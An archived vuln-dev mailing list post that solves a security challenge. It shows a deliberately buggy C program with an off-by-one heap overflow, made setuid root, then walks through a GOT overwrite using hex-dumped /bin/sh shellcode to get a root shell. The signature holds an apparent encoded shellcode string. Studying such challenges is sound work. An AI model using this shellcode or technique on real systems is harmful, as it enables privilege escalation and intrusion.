Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further.. matrix@overdose vuln-dev $ cat vulndev1.c // vulndev-1.c // vuln-dev mailing list security challenge #1 // by Aaron Adams <aadamsat_private> // Spot the error in this program. #include <stdio.h> #include <stdlib.h> #define SIZE 252 int main(int argc, char *argv[]) { int i; char *p1, *p2; char *buf1 = malloc(SIZE); char *buf2 = malloc(SIZE); if (argc != 3) exit(1); p1 = argv[1], p2 = argv[2]; printf("p1 is at %p\n", p1); // DEBUG strncpy(buf2, p2, SIZE); for (i = 0; i <= SIZE && p1[i] != '\0'; i++) buf1[i] = p1[i]; free(buf1); free(buf2); return 0; } matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c matrix@overdose vuln-dev $ sudo chown root.root ./vuln1 matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1 matrix@overdose vuln-dev $ objdump -R ./vuln1 ./vuln1: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049654 R_386_GLOB_DAT __gmon_start__ 0804963c R_386_JUMP_SLOT malloc 08049640 R_386_JUMP_SLOT __libc_start_main 08049644 R_386_JUMP_SLOT printf 08049648 R_386_JUMP_SLOT exit 0804964c R_386_JUMP_SLOT free 08049650 R_386_JUMP_SLOT strncpy matrix@overdose vuln-dev $ pcalc 0x4c-12 64 0x40 0y1000000 matrix@overdose vuln-dev $ od -ch shell 0000000 1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210 c031 46b0 db31 c931 80cd 16eb 315b 88c0 0000020 C \a 211 [ \b 211 C \f 260 \v 215 K \b 215 S \f 0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53 0000040 315 200 350 345 377 377 377 / b i n / s h 80cd e5e8 ffff 2fff 6962 2f6e 6873 0000056 matrix@overdose vuln-dev $ wc -c shell 46 shell matrix@overdose vuln-dev $ pcalc 252-46 206 0xce 0y11001110 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"` p1 is at 0xbffff839 Segmentation fault matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"` p1 is at 0xbffff839 sh-2.05b# id uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b# questions? comments? >=) -- %JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ-yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPPPPPPPPPPPPPPPPPPPPP
This archive was generated by hypermail 2b30 : Tue May 13 2003 - 21:35:06 PDT